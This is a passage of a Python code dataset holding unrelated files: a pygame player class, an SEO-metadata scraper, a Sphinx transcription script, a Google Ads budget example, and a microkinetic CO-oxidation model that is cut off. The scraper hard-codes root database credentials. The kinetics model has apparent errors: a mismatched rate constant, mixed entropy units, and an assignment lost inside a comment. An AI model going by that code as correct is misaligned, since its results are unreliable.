\"me\"\n if not self.facing_right:\n texture = \"me_left\"\n if self.yDirection or self.xDirection:\n screen.blit(texture_lib[texture], (pos[0], pos[1]-h_s[self.walk_cycle.get()]))\n if self.walk_cycle.changed() and self.walk_cycle.current == 0:\n sn_walk.play_once()\n else:\n screen.blit(texture_lib[texture], pos)\n if self.walk_cycle.tick != 0 or self.walk_cycle.current != 0:\n self.walk_cycle.reset()\n\n def handle_event(self, event):\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_a:\n self.xDirection -= 1\n elif event.key == pygame.K_d:\n self.xDirection += 1\n elif event.key == pygame.K_w:\n self.yDirection -= 1\n elif event.key == pygame.K_s:\n self.yDirection += 1\n elif event.type == pygame.KEYUP:\n if event.key == pygame.K_a:\n self.xDirection += 1\n elif event.key == pygame.K_d:\n self.xDirection -= 1\n elif event.key == pygame.K_w:\n self.yDirection += 1\n elif event.key == pygame.K_s:\n self.yDirection -= 1\n elif event.key == pygame.K_k:\n if ENV[\"item_interact\"]:\n item = ENV[\"item_interact\"]\n flag = True\n if item.item_id == 1:\n self.game.start_chat_scene(\"door\", next_map=True)\n elif item.item_id == 2:\n self.game.start_chat_scene(\"mom\", next_map=True)\n elif item.item_id == 3:\n self.game.start_chat_scene(\"mystery\", next_map=True)\n elif item.item_id == 4:\n self.game.start_chat_scene(\"box\", next_map=True)\n elif item.item_id == 5:\n self.game.start_chat_scene(\"medicine\")\n self.game.current_map.remove_item(5)\n self.game.inventory.add_item(\"medicine\")\n elif item.item_id == 6:\n if self.game.inventory.has_item(\"medicine\"):\n self.game.start_chat_scene(\"table2\", next_map=True)\n else:\n self.game.start_chat_scene(\"table1\")\n elif item.item_id == 7:\n self.game.start_chat_scene(\"shovel\")\n self.game.current_map.remove_item(7)\n self.game.inventory.add_item(\"shovel\")\n elif item.item_id == 8:\n if self.game.inventory.has_item(\"shovel\"):\n self.game.start_chat_scene(\"hole2\", next_map=True)\n else:\n self.game.start_chat_scene(\"hole1\")\n elif item.item_id == 9:\n self.game.start_chat_scene(\"injector\")\n self.game.current_map.remove_item(9)\n self.game.inventory.add_item(\"injector\")\n elif item.item_id == 10:\n if self.game.inventory.has_item(\"injector\"):\n self.game.start_chat_scene(\"cream2\", next_map=True)\n else:\n self.game.start_chat_scene(\"cream1\")\n elif item.item_id == 11:\n self.game.start_chat_scene(\"q12\", next_map=True)\n elif item.item_id == 12:\n self.game.start_chat_scene(\"q22\", next_map=True)\n elif item.item_id == 13:\n self.game.start_chat_scene(\"q32\", next_map=True)\n else:\n flag = False\n if flag:\n sn_interact.play_once()\n\n def move(self, dx, dy):\n self.pos[0] += dx\n if dx > 0:\n self.facing_right = True\n elif dx < 0:\n self.facing_right = False\n self.pos[1] += dy\n if self.pos[0] < 0:\n self.pos[0] = 0\n if self.pos[0] > 720:\n self.pos[0] = 720\n if self.pos[1] < 270:\n self.pos[1] = 270\n if self.pos[1] > 500:\n self.pos[1] = 500\n\n def update(self):\n\n if self.xDirection != 0 or self.yDirection != 0:\n speed = 6\n if self.xDirection != 0 and self.yDirection != 0:\n speed = 6/sqrt(2)\n self.move(speed * self.xDirection, speed * self.yDirection)\n","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":5305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"277087914","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\nimport requests\nfrom bs4 import BeautifulSoup\nimport logging\nimport MySQLdb\nimport datetime,time\nimport random\n\ndef getHtml(url):\n\tuser_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'\n\theaders = {\n\t\t'User-Agent' : user_agent,\n\t\t'Referer':'http://www.google.com/'\n\t\t}\n\thtml = requests.get(url,headers=headers)\n\treturn html\ndef getSoup(html):\n\tsoup = BeautifulSoup(str(html.content), \"html.parser\")\n\treturn soup\ndef getTitle(soup):\n\ttry:\n\t\ttitle = soup.title.string\n\t\treturn title\n\texcept:\n\t\treturn ''\ndef getDescription(soup):\n\ttry:\n\t\tdescription = soup.find(attrs={\"name\":\"description\"})['content'] \n\t\treturn description\n\texcept:\n\t\treturn ''\ndef getKeywords(soup):\n\ttry:\n\t\tkeywords = soup.find(attrs={\"name\":\"keywords\"})['content'] \n\t\treturn keywords\n\texcept:\n\t\treturn ''\ndef getCanonical(soup):\n\ttry:\n\t\tcanonical = soup.find(attrs={\"rel\":\"canonical\"})['href']\n\t\treturn canonical\n\texcept:\n\t\treturn ''\ndef getH1(soup):\n\ttry:\n\t\th1 = soup.find('h1').get_text()\n\t\treturn h1\n\texcept:\n\t\treturn ''\ndef getOutlinks(soup):\n\ttry:\n\t\thref = soup.find_all(\"a\",href=True)\n\t\ti = 0\n\t\tfor x in href:\n\t\t\tif x.get(\"href\") != \"\":\n\t\t\t\ti = i+1\n\t\treturn i\n\texcept:\n\t\treturn ''\ndef getHrefs(soup):\n\ttry:\n\t\threfs = soup.find_all(\"a\",href=True)\n\t\treturn hrefs\n\texcept:\n\t\treturn ''\ndef main():\n\t#SQLs\n\tsqlselect = \"SELECT * FROM pages\"\n\tsqlupdate = \"UPDATE pages set check_at = %s where id = %s\"\n\tsqlinsert = \"INSERT INTO checkinfos (page_id,title,description,keywords,canonical,h1,status,outlinks,created_at,updated_at) values (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\n\tsqlhrefinsert = \"INSERT INTO outlinks (page_id,href,rel,created_at,updated_at) values (%s,%s,%s,%s,%s)\"\n\t#Open SQL\n\tconn = MySQLdb.connect(\n host = 'localhost',\n port = 3306,\n user = 'root',\n passwd = 'root',\n db = 'checkseo',\n charset = 'utf8',\n )\n\tcursor = conn.cursor()\n\t#Select Pages\n\tcursor.execute(sqlselect)\n\tpages = cursor.fetchall()\n\tfor page in pages:\n\t\turl = page[3]\n\t\thtml = getHtml(url)\n\t\tsoup = getSoup(html)\n\t\ttitle = getTitle(soup)\n\t\tdescription = getDescription(soup)\n\t\tkeywords = getKeywords(soup)\n\t\tcanonical = getCanonical(soup)\n\t\th1 = getH1(soup)\n\t\tstatus = html.status_code\n\t\toutlinks = getOutlinks(soup)\n\t\tnow = time.strftime(\"%Y-%m-%d %H:%M:%S\")\n\t\t#Insert Outlinks\n\t\threfs = getHrefs(soup)\n\t\tfor href in hrefs:\n\t\t\tif href.get(\"rel\") == None:\n\t\t\t\trel = \"follow\"\n\t\t\telse:\n\t\t\t\trel = \"nofollow\"\n\t\t\tif href.get(\"href\") != \"\":\n\t\t\t\tcursor.execute(sqlhrefinsert,(page[0],href.get(\"href\"),rel,now,now))\n\t\t#Update Pages\n\t\tcursor.execute(sqlupdate,(now,page[0]))\n\t\t#Insert Checkinfos\n\t\tcursor.execute(sqlinsert,(page[0], title, description, keywords, canonical, h1, status, outlinks,now,now))\n\t\t#Commit\n\t\tconn.commit()\n\tcursor.close()\n\tconn.close()\n\nif __name__ == '__main__':\n\twhile 1:\n\t\t#Log\n\t\tlogging.basicConfig(level = logging.DEBUG,\n\t\t\t\t\t\t\tformat = '%(process)d %(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',\n\t\t\t\t\t\t\tdatefmt = '%a, %d %b %Y %H:%M:%S',\n\t\t\t\t\t\t\tfilename = 'CheckSEO.log',\n\t\t\t\t\t\t\tfilemode = 'w')\n\t\t#Start\n\t\tlogging.info(\"Today Start %s\" % time.strftime(\"%Y-%m-%d %H:%M:%S\"))\n\t\t#Main\n\t\tmain()\n\t\t#Sleep Till Tomorrow\n\t\tt = (datetime.datetime.strptime((str(datetime.date.today()+datetime.timedelta(1))+\" 00:00:00\"),'%Y-%m-%d %H:%M:%S')-datetime.datetime.now()).seconds+int(random.uniform(600, 6000))\n\t\tlogging.info(\"Today End! Start Sleep %ss (Sleep Till Tomorrow)\" % t)\n\t\ttime.sleep(t)","sub_path":"Python/CheckSEO.py","file_name":"CheckSEO.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"545597469","text":"#import speech_recognition as sr\r\n#r = sr.Recognizer()\r\n#with sr.WavFile(\"audiotrump.wav\") as source: # use \"test.wav\" as the audio source\r\n # audio = r.record(source) # extract audio data from the file\r\n\r\n#try:\r\n # print(\"Transcription: \" + r.recognize_sphinx(audio)) # recognize speech using Google Speech Recognition\r\n#except LookupError: # speech is unintelligible\r\n # print(\"Could not understand audio\")\r\n\r\n\r\n#!/usr/bin/env python3\r\n\r\nimport speech_recognition as sr\r\n\r\n# obtain path to \"english.wav\" in the same folder as this script\r\nfrom os import path\r\nAUDIO_FILE = path.join(path.dirname(path.realpath(__file__)), \"Short_clip3.wav\")\r\n# AUDIO_FILE = path.join(path.dirname(path.realpath(__file__)), \"french.aiff\")\r\n# AUDIO_FILE = path.join(path.dirname(path.realpath(__file__)), \"chinese.flac\")\r\n\r\n# use the audio file as the audio source\r\nr = sr.Recognizer()\r\nwith sr.AudioFile(AUDIO_FILE) as source:\r\n audio = r.record(source) # read the entire audio file\r\n\r\n# recognize speech using Sphinx\r\ntry:\r\n print(\"Sphinx thinks you said \" + r.recognize_sphinx(audio))\r\nexcept sr.UnknownValueError:\r\n print(\"Sphinx could not understand audio\")\r\nexcept sr.RequestError as e:\r\n print(\"Sphinx error; {0}\".format(e))\r\n","sub_path":"sphinx.py","file_name":"sphinx.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"454545149","text":"#!/usr/bin/env python\n# Copyright 2018 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"This illustrates how to get all account budgets for a Google Ads customer.\"\"\"\n\n\nimport argparse\nimport sys\n\nfrom google.ads.googleads.client import GoogleAdsClient\nfrom google.ads.googleads.errors import GoogleAdsException\n\n\ndef main(client, customer_id):\n ga_service = client.get_service(\"GoogleAdsService\")\n\n query = \"\"\"\n SELECT\n account_budget.status,\n account_budget.billing_setup,\n account_budget.approved_spending_limit_micros,\n account_budget.approved_spending_limit_type,\n account_budget.proposed_spending_limit_micros,\n account_budget.proposed_spending_limit_type,\n account_budget.adjusted_spending_limit_micros,\n account_budget.adjusted_spending_limit_type,\n account_budget.approved_start_date_time,\n account_budget.proposed_start_date_time,\n account_budget.approved_end_date_time,\n account_budget.approved_end_time_type,\n account_budget.proposed_end_date_time,\n account_budget.proposed_end_time_type\n FROM account_budget\"\"\"\n\n stream = ga_service.search_stream(customer_id=customer_id, query=query)\n\n for batch in stream:\n for row in batch.results:\n budget = row.account_budget\n\n # Here and in the statements below, the variable is set to the\n # name of the Enum as a default if the numeric value for the\n # monetary or date fields is not present.\n approved_spending_limit = (\n micros_to_currency(budget.approved_spending_limit_micros)\n or budget.approved_spending_limit_type.name\n )\n\n proposed_spending_limit = (\n micros_to_currency(budget.proposed_spending_limit_micros)\n or budget.proposed_spending_limit_type.name\n )\n\n adjusted_spending_limit = (\n micros_to_currency(budget.adjusted_spending_limit_micros)\n or budget.adjusted_spending_limit_type.name\n )\n\n approved_end_date_time = (\n budget.approved_end_date_time\n or budget.approved_end_time_type.name\n )\n\n proposed_end_date_time = (\n budget.proposed_end_date_time\n or budget.proposed_end_time_type.name\n )\n\n amount_served = (\n micros_to_currency(budget.amount_served_micros) or 0.0\n )\n\n total_adjustments = (\n micros_to_currency(budget.total_adjustments_micros) or 0.0\n )\n\n print(\n f'Account budget \"{budget.resource_name}\", '\n f'with status \"{budget.status.name}\", '\n f'billing setup \"{budget.billing_setup}\", '\n f\"amount served {amount_served:.2f}, \"\n f\"total adjustments {total_adjustments:.2f}, \"\n f'approved spending limit \"{approved_spending_limit}\" '\n f'(proposed \"{proposed_spending_limit}\" -- '\n f'adjusted \"{adjusted_spending_limit}\"), approved '\n f'start time \"{budget.approved_start_date_time}\" '\n f'(proposed \"{budget.proposed_start_date_time}\"), '\n f'approved end time \"{approved_end_date_time}\" '\n f'(proposed \"{proposed_end_date_time}\").'\n )\n\n\ndef micros_to_currency(micros):\n return micros / 1000000.0 if micros is not None else None\n\n\nif __name__ == \"__main__\":\n # GoogleAdsClient will read the google-ads.yaml configuration file in the\n # home directory if none is specified.\n googleads_client = GoogleAdsClient.load_from_storage(version=\"v14\")\n\n parser = argparse.ArgumentParser(\n description=(\n \"Lists all account budgets for given Google Ads customer ID.\"\n )\n )\n # The following argument(s) should be provided to run the example.\n parser.add_argument(\n \"-c\",\n \"--customer_id\",\n type=str,\n required=True,\n help=\"The Google Ads customer ID.\",\n )\n args = parser.parse_args()\n\n try:\n main(googleads_client, args.customer_id)\n except GoogleAdsException as ex:\n print(\n f'Request with ID \"{ex.request_id}\" failed with status '\n f'\"{ex.error.code().name}\" and includes the following errors:'\n )\n for error in ex.failure.errors:\n print(f'\\tError with message \"{error.message}\".')\n if error.location:\n for field_path_element in error.location.field_path_elements:\n print(f\"\\t\\tOn field: {field_path_element.field_name}\")\n sys.exit(1)\n","sub_path":"examples/billing/get_account_budgets.py","file_name":"get_account_budgets.py","file_ext":"py","file_size_in_byte":5261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"415997310","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Microkinetic Model for CO Oxidation (Pd), (PdO) and (PdO2) + O2 ads\n\n# Reactions - 1 - 8\n# \n# ![image.png](attachment:image.png)\n\n# Reactions 6' - 11\n# ![image.png](attachment:image.png)\n\n# Reactions 12-14\n# ![image.png](attachment:image.png)\n\n# Reactions 15-16 for O2 adsorption on Pd\n# \n# ![image.png](attachment:image.png)\n\n# First, we import the necessary numpy and scipy modules\n\n# In[1]:\n\n\nimport numpy as np\nimport math\nfrom scipy.integrate import odeint\nfrom sklearn.linear_model import LinearRegression\nmodel = LinearRegression()\n\n\n# We also need to define a set of reaction conditions\n\n# # Microkinetic Model\n\n# In[2]:\n\n\n# T = 480 # K\n# PCO = 0.02 # bar PCO is 2%\n# PO2 = 0.20 # bar PO2 is 20%\nPCO2 = 0 # bar\nR = 8.314\nmAr = 39.848\nmCO = 28.0101\nmO2 = 32\nmCO2 = 44\n\nSCOn = 197.660\nSO2n = 205.152\nSCO2n = 213.79\n\n\n# ... and a few physical constants and conversion factors\n\n# In[3]:\n\n\nJ2eV = 6.24150974E18 # eV/J\nNa = 6.0221415E23 # mol-1\nh = 6.626068E-34 * J2eV # in eV*s\nkb = 1.3806503E-23 * J2eV # in eV/K\n# kbT = kb * T # in eV\n\n\n# ## Rate constants\n\n# In[4]:\n\n\ndef get_rate_constants(T):\n kbT = kb * T # in eV\n # Gas phase entropies converted to eV/K\n SCOg = 197.66 * J2eV / Na # eV/K\n SO2g = 205.0 * J2eV / Na\n SCO2g = 213.74 * J2eV / Na\n \n # Surface entropies as per charlie campbell's paper\n# SCO2v = Sv = SO2v = SO = SCOO = 0\n SCO = (0.70*SCOn - 3.3*R)*J2eV/Na\n SCO2 = (0.70*SCO2n - 3.3*R)*J2eV/Na\n SO2 = (0.70*SO2n - 3.3*R)*J2eV/Na\n \n # Reaction energies\n dE = np.zeros(19) # array initialization\n dE[0] = -1.09 # CO adsorption (-1.09)\n dE[1] = -0.22 # 1st CO oxidation\n dE[2] = 0.52 # 1st CO2 desorption (0.52)\n dE[3] = -2.07 # O2 adsorption in a vacancy\n dE[4] = -1.29 # O2 dissociation in the vacancy\n dE[5] = -0.65 # 2nd CO adsorption (-0.65)\n dE[6] = -1.46 # 2nd CO oxidation\n dE[7] = -0.0057 # 2nd CO2 desorption\n dE[8] = -0.65 # rxn 6'- 2nd CO adsorption using lattice O\n dE[9] = 0.33 # rxn 7' - 2nd CO oxidation using lattice O (0.33)\n dE[10] = 0.58 # rxn 8' - 2nd CO2 desorption leading to (V+O)*\n dE[11] = -2.34 # rxn 9 - O2 adsorption at (v+O)*\n dE[12] = -0.97 # rxn 10 -O2 dissociation at (v+O)*\n dE[13] = -1.27 # rxn 11 - O migration from (V+O)* --> *\n dE[14] = -0.35 # rxn 12 - CO adsorption at 2O*\n dE[15] = -2.31 # rxn 13 - CO oxidation at 2O*\n dE[16] = 0.45 # rxn 14 - CO2 desorption from O*\n dE[17] = -0.0067 # rxn 15 - O2 adsorption on *\n dE[18] = -1.77 # rxn 16 - O2 dissociation on * to give 2O*\n\n\n\n # Entropy changes (Ignoring dependence on T)\n# dSS = 0.001\n dS = np.zeros(19) # array initialization\n dS[0] = SCO - SCOg # CO adsorption\n dS[1] = 0 # 1st CO oxidation\n dS[2] = SCO2g - SCO2 # 1st CO2 desorption\n dS[3] = SO2 - SO2g # O2 adsorption in a vacancy\n dS[4] = 0 # O2 dissociation in the vacancy\n dS[5] = SCO - SCOg # 2nd CO adsorption\n dS[6] = 0 # 2nd CO oxidation\n dS[7] = SCO2g - SCO2 # 2nd CO2 desorption\n dS[8] = SCO - SCOg # rxn 6'- 2nd CO adsorption using lattice O\n dS[9] = 0 # rxn 7' - 2nd CO oxidation using lattice O\n dS[10] = SCO2g - SCO2 # rxn 8' - 2nd CO2 desorption leading to (V+O)*\n dS[11] = SO2 - SO2g # rxn 9 - O2 adsorption at (v+O)*\n dS[12] = 0 # rxn 10 -O2 dissociation at (v+O)*\n dS[13] = 0 # rxn 11 - O migration from (V+O)* --> *\n dS[14] = SCO - SCOg # rxn 12 - CO adsorption at 2O*\n dS[15] = 0 # rxn 13 - CO oxidation at 2O*\n dS[16] = SCO2g - SCO2 # rxn 14 - CO2 desorption from O*\n dS[17] = SO2 - SO2g # rxn 15 - O2 adsorption on *\n dS[18] = 0 # rxn 16 - O2 dissociation on * to give 2O*\n\n \n # Activation energy barriers\n Ea = np.zeros(19) # array initialization\n Ea[1] = 0.49 # 1st CO Oxidation barrier = 0.49\n Ea[9] = 0.69 # 2nd CO Oxidation barrier using lattice O (0.69)\n Ea[12] = 0.51 # O2 dissociation barrier at (v+O)*\n Ea[13] = 0.18 # O migration barrier from (v+O)* ---> *\n Ea[18] = 1.44 # rxn 16 - O2 dissociation on * to give 2O*\n Ea[6] = 0.19 # 2nd CO Oxidation barrier (assumed)\n \n\n # Entropy changes to the transition state\n STS = np.zeros(19) # array initialization \n STS[0] = (0.30*SCOn/R + 3.3-1/3*(18.6+math.log((mCO/mAr)**1.5*(T/298)**2.5)))*R # 1st CO adsorption entropy - ignoring \n # SCOn dependence on T\n STS[2] = (0.30*SCO2n/R + 3.3-1/3*(18.6+math.log((mCO2/mAr)**1.5*(T/298)**2.5)))*kb # 1st CO2 adsorption entropy \n STS[3] = (0.30*SO2n/R + 3.3-1/3*(18.6+math.log((mO2/mAr)**1.5*(T/298)**2.5)))*R # O2 adsorption entropy \n STS[5] = STS[14]= STS[8] = STS[0] # CO adsorption entropiesSTS[7] = STS[2] \n STS[10]= STS[16] = STS[2] # CO2 adsorption entropies\n STS[17]= STS[11] = STS[3]\n\n # Calculate equilibrium and rate constants\n K = [0]*19 # equilibrium constants\n kf = [0]*19 # forward rate constants\n kr = [0]*19 # reverse rate constants\n for i in range(19):\n dG = dE[i] - T*dS[i]\n K[i] = np.exp(-dG/kbT)\n \n # Enforce Ea > 0, and Ea > dE \n if i not in [0,3,5,8,11,14,17]: #(steps 0, 3 and 5 are adsorption steps)\n Ea[i] = max([0,dE[i],Ea[i]]) \n kf[i] = kbT/h * np.exp(STS[i]/kb) * np.exp(-Ea[i]/kbT)\n kr[i] = kf[i]/K[i] # enforce thermodynamic consistency\n else:\n Ea[i] =-dE[i] # Ea[i] = Eads\n kr[i] = kbT/h * np.exp(STS[i]/R) * np.exp(-Ea[i]/kbT) # STS = TS-ads for adsorption 0,3 and 5 \n kf[i] = K[i]*kr[i]\n \n return (kf,kr,Ea) \n\n\n# ## Rates and intermediate species coverage (theta)\n\n# Next, we need to calculate the rates for each step. As input we provide the rate constants $k_i$ and the coverages $\\theta_i$. The input variables are passed as arrays.\n\n# In[5]:\n\n\ndef get_rates(theta,kf,kr,P):\n \n # Extract elements of theta and assign them\n # to more meaningful variables\n tCO = theta[0] # coverage of CO\n tCO2v = theta[1] \n tvac = theta[2] \n tO2v = theta[3]\n tO = theta[4]\n tCOO = theta[5]\n tCO2 = theta[6]\n tCOOL = theta[7]\n tCO2L = theta[8]\n tvplusO = theta[9]\n tO2plusvplusO = theta[10]\n t2O = theta[11]\n tCOplus2O = theta[12]\n tCO2plusO = theta[13]\n tO2 = theta[14]\n tstar = 1.0 - tCO - tCO2v - tvac - tO2v - tO - tCOO - tCO2 - tCOOL -tCO2L - tvplusO -tO2plusvplusO -t2O -tCOplus2O -tCO2plusO - tO2 # site balance\n \n PCO = P[0]\n PO2 = P[1]\n\n # Caluclate the rates: eqns (39)-(42)\n rate = [0]*19 # array with 8 zeros\n rate[0] = kf[0] * PCO * tstar - kr[0] * tCO\n rate[1] = kf[1] * tCO - kr[1] * tCO2v\n rate[2] = kf[2] * tCO2v - kr[2] * PCO2 * tvac\n rate[3] = kf[3] * tvac * PO2 - kr[3] * tO2v\n rate[4] = kf[4] * tO2v - kr[4] * tO\n rate[5] = kf[5] * tO * PCO - kr[4] * tCOO\n rate[6] = kf[6] * tCOO - kr[6] * tCO2\n rate[7] = kf[7] * tCO2 - kr[7] * PCO2 * tstar\n \n rate[8] = kf[8] * tO * PCO - kr[8] * tCOOL\n rate[9] = kf[9] * tCOOL - kr[9] * tCO2L\n rate[10] = kf[10] * tCO2L - kr[10] * PCO2 * tvplusO\n \n rate[11] = kf[11] * tvplusO * PO2 - kr[11] * tO2plusvplusO\n rate[12] = kf[12] * tO2plusvplusO - kr[12] * t2O\n rate[13] = kf[13] * tvplusO - kr[13] * tstar\n \n rate[14] = kf[14] * t2O * PCO - kr[14] * tCOplus2O\n rate[15] = kf[15] * tCOplus2O - kr[15] * tCO2plusO\n rate[16] = kf[16] * tCO2plusO - kr[16] * PCO2 * tO\n \n rate[17] = kf[17] * tstar * PO2 - kr[17] * tO2\n rate[18] = kf[18] * tO2 - kr[18] * t2O\n \n return rate \n\n\n# ## Solving ODE equations\n\n# We also need to define the systems of ordinary differential equations (ODEs) that we intend to solve. Note that we solve the transient problem without assuming steady-state and integrate for very long times. This is often a more robust technique to find a physical solution.\n\n# In[6]:\n\n\ndef get_odes(theta,t,kf,kr,P):\n# returns the system of ODEs d(theta)/dt, calculated at the current value of theta (and time t)\n\n rate = get_rates(theta,kf,kr,P) # calculate rates at current value of theta\n\n # Time derivatives of theta\n dt = [0]*15\n dt[0] = rate[0] - rate[1] # d(tCO)/dt\n dt[1] = rate[1] - rate[2] \n dt[2] = rate[2] - rate[3] \n dt[3] = rate[3] - rate[4] \n dt[4] = rate[4] - rate[5] + rate[16] - rate[8] #d(tO)/dt\n dt[5] = rate[5] - rate[6] \n dt[6] = rate[6] - rate[7] \n \n dt[7] = rate[8] - rate[9]\n dt[8] = rate[9] - rate[10]\n \n dt[9] = rate[10] - rate[11] -rate[13] #d(v+O)/dt\n \n dt[10] = rate[11] - rate[12]\n \n dt[11] = rate[12] - rate[14] + rate[18] #d(t2O)/dt\n \n dt[12] = rate[14] - rate[15]\n dt[13] = rate[15] - rate[16]\n dt[14] = rate[17] - rate[18]\n\n \n return dt\n\n\n# To solve the system of ODEs we need to provide an initial guess. If we don't know any better, a good starting point is always a completely empty surface.\n\n# In[7]:\n\n\n# theta0 = (0.0, 0., 0., 0 , 0 , 0 , 0.0) # initial coverage of CO*, CO2+v*, vac*, O2v*, O*, COO*, CO2*, COO(L)*,CO2(L)*, (v+O)*,(O2+v+O)*, 2O*, (CO+2O)*, (CO2+O)*, O2* respectively\ntheta0 =np.zeros(15)\n\n\n# And now we are ready to start the integration from $\\theta_0$ to $\\theta_{steady-state}$ over a long enough time span. Here, the time span is set to 1E6 sec, but you need to test if this is sufficient to reach steady-state. If you lower the time span and still obtain identical results, steady-state has been reached.\n\n# We can now inspect the results. Since we may want to do this more than once, we can define a customized print function for our output.\n\n# In[8]:\n\n\ndef solve_ode(kf,kr,theta0,P):\n# Solve the system of ODEs using scipy.integrate.odeint\n# Assumes an empty surface as initial guess if nothing else is provided\n from scipy.integrate import odeint\n\n # Integrate the ODEs for 1E6 sec (enough to reach steady-state)\n theta = odeint(get_odes, # system of ODEs\n theta0, # initial guess\n [0,1E6], # time span\n args = (kf,kr,P), # arguments to get_odes()\n h0 = 1E-36, # initial time step\n mxstep = 90000) # maximum number of steps\n# rtol = 1E-12, # relative tolerance\n# atol = 1E-15) # absolute tolerance\n\n return theta[-1,:]\n\n\n# ## Solutions to the rates and coverage of the intermediate species\n\n# In[9]:\n\n\ndef print_output(theta0,T,P):\n# Prints the solution of the model\n (kf,kr,Ea) = get_rate_constants(T)\n theta = solve_ode(kf,kr,theta0,P)\n rates = get_rates(theta,kf,kr,P)\n# print (\"the result is:\")\n# print\n# for r,rate in enumerate(rates):\n# if r in [0,3,5,8,11,14,17]:\n# print (\"Step\",r,\": rate =\",rate,\", kf =\",kf[r],\", kr=\",kr[r],\", reverse Ea =\",Ea[r])\n# else:\n# print(\"Step\",r,\": rate =\",rate,\", kf =\",kf[r],\", kr=\",kr[r],\", Ea =\",Ea[r])\n# print (\"The coverages for CO*, CO2+v*, vac*, O2v*, O*, COO*, CO2*, COO(L)*,CO2(L)*, (v+O)*,(O2+v+O)*, 2O*, (CO+2O)*, (CO2+O)*, O2* are:\")\n# for t in theta:\n# print (t)\n return (rates[1]+rates[6]+rates[9]+rates[15],theta[0])\n\n\n# And we call the function with our output values, i.e., the last row of the result matrix $\\theta$.\n\n# In[10]:\n\n\nprint_output(theta0,473,[0.02,0.20])\n\n\n# ## Reaction orders ($P_{CO}$ & $P_{O2}$) and apparent barrier\n\n# In[11]:\n\n\ndef rxn_order_CO(T,P):\n gridpoints = 3\n rate_PCO=np.zeros(gridpoints)\n PCO1=P[0]\n PCO2=PCO1+0.05\n PCO_range = np.linspace(PCO1,PCO2,gridpoints)\n for i,PCO in enumerate(PCO_range):\n rate_PCO[i]=print_output(theta0,T,[PCO,P[1]])[0] # PO2 = 0.20 \n if rate_PCO[i]<10**-323:\n rate_PCO[i]=10**-323\n PCO_range = PCO_range.reshape(-1, 1)\n LR_CO=model.fit(np.log(PCO_range), np.log(rate_PCO))\n order_CO=LR_CO.coef_ # LR.intercept_\n return order_CO[0]\n\n\n# In[12]:\n\n\ndef rxn_order_O2(T,P):\n gridpoints = 3\n rate_PO2=np.zeros(gridpoints)\n PO21=P[1]\n PO22=PO21+0.1\n PO2_range = np.linspace(PO21,PO22,gridpoints)\n for i,PO2 in enumerate(PO2_range):\n rate_PO2[i]=print_output(theta0,T,[P[0],PO2])[0] #PCO = 0.02\n if rate_PO2[i]<10**-323:\n rate_PO2[i]=10**-323\n PO2_range = PO2_range.reshape(-1, 1)\n LR_O2=model.fit(np.log(PO2_range), np.log(rate_PO2))\n order_O2=LR_O2.coef_ # LR.intercept_\n return order_O2[0]\n\n\n# ## Apparent barrier\n\n# In[13]:\n\n\ndef apparent_barrier(T,P):\n gridpoints = 3\n rate_app=np.zeros(gridpoints)\n T1=T-1\n T2=T+1\n T_range = np.linspace(T1,T2,gridpoints)\n for i,T in enumerate(T_range):\n rate_app[i]=print_output(theta0,T,P)[0] # PCO and PO2 are 0.02 and 0.20 respectively\n if rate_app[i]<10**-323:\n rate_app[i]=10**-323\n # plt.plot(1/T_range, np.log(rate_app), 'ro')\n# plt.xlabel('1/T')\n# plt.ylabel('log[rate_CO2_formation]')\n# plt.show()\n T_range = T_range.reshape(-1, 1)\n LR=model.fit(1/T_range, np.log(rate_app)) #Arhenius equation\n LR.coef_\n # apparent_barrier=-LR.coef_*0.02568/298 #apparent barrier in eV\n apparent_barrier=-LR.coef_*kb #apparent barrier in eV\n apparent_barrier[0] # LR.intercept_\n return apparent_barrier[0]\n\n\n# In[14]:\n\n\nprint('Reaction order of CO: %.4f ' % rxn_order_CO(473,[0.02,0.20]))\nprint('Reaction order of O2: %.4f ' % rxn_order_O2(473,[0.02,0.20]))\nprint('Apparent activation Barrier: %.2f eV' % apparent_barrier(473,[0.02,0.20]))\n\n\n# ## Degree of rate Control\n\n# In[15]:\n\n\ndef degree_of_rate_control(theta0,T,P):\n# Prints the solution of the model\n \n diffk_0=0.99 \n diffk_1=1.01 \n\n XRC=np.zeros(19)\n for i in range(19):\n (kf0,kr0,Ea) = get_rate_constants(T)\n kf0[i]=kf0[i]*diffk_0\n kr0[i]=kr0[i]*diffk_0\n theta = solve_ode(kf0,kr0,theta0,P)\n rates0 = get_rates(theta,kf0,kr0,P)[1]+get_rates(theta,kf0,kr0,P)[6]+get_rates(theta,kf0,kr0,P)[9]+get_rates(theta,kf0,kr0,P)[15]\n \n (kf1,kr1,Ea) = get_rate_constants(T)\n kf1[i]=kf1[i]*diffk_1\n kr1[i]=kr1[i]*diffk_1\n theta = solve_ode(kf1,kr1,theta0,P)\n# rates1 = get_rates(theta,kf1,kr1,P)\n rates1 = get_rates(theta,kf1,kr1,P)[1]+get_rates(theta,kf1,kr1,P)[6]+get_rates(theta,kf1,kr1,P)[9]+get_rates(theta,kf1,kr1,P)[15]\n# print(rates0,rates1)\n \n XRC[i] = (math.log(rates1/rates0))/(math.log(kf1[i]/kf0[i])) \n print(rates0,rates1,np.round(XRC[i],3))\n return 